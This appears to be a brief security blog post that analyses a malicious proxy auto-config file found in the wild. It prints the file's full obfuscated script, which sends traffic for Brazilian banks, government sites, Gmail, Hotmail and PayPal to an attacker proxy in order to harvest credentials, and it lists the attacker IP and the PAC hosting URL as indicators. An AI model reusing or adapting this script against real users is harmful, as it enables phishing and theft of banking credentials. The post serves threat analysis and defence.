I captured this pac file on the last week, that use a little obfuscate technique:
function FindProxyForURL(url, host) {
var n = new Array("duh.bradfsco",
"bradfsco",
"duh.bradfscoprimf",
"bradfscoprimf",
"duh.santandfrfmprfsaryal",
"santandfrfmprfsaryal",
"hsbc",
"duh.hsbc",
"hsbcprfmyfr",
"duh.hsbcprfmyfr",
"santandfrfmprfsaryal",
"santanderempresarial",
"banfspa",
"duh.banfspa",
"santandfr",
"duh.santandfr",
"santandfr",
"bancorfal",
"duh.bancorfal",
"syds.mg.gov.br",
"duh.syds.mg.gov.br",
"cytybank",
"duh.cytybank",
"sycredy",
"duh.sycredy",
"amerycanexpress",
"duh.amerycanexpress",
"ytau",
"duh.ytau",
"ytaupersonnalyte",
"duh.ytaupersonnalyte",
"hotmayl",
"duh.hotmayl",
"lyve",
"duh.lyve",
"pazpal",
"duh.pazpal",
"cayxa.gov.br",
"duh.cayxa.gov.br",
"duh.gmayl",
"gmayl",
"duh.hotmayl",
"hotmayl"
);
for(var i =0;i<n.length;i++) {
str = n[i];
str = str.replace(/f/gi,"e");
str = str.replace(/z/gi,"y");
str = str.replace(/duh/gi,"www");
str = str.replace(/y/gi, "i");
if(str.indexOf("caixa") != -1)
str = str;
else if(str.indexOf("paypal") != -1)
str = str + ".com";
else if(str.indexOf("gmail") != -1)
str = str + ".com";
else if(str.indexOf("hotmail") != -1)
str = str + ".com";
else
str = str + ".com.br";
if (shExpMatch(host, str)) {
return "PROXY 218.208.33.196:80";
}
}
return "DIRECT";
}
See that, beyond Brazilian banks, have some credential
harvester for gmail, hotmail/live and paypal.
The url for auto-proxy configuration that I find:
http://218.208.33.196/readme/feather.txt
This IP have a bad reputation by open proxy, spam
and phishing activity
Some References by @assoline:
Benign_Feature_Malicious_Use
attackers-using-malicious-pac-files-phishing-attacks
Nenhum comentário:
Postar um comentário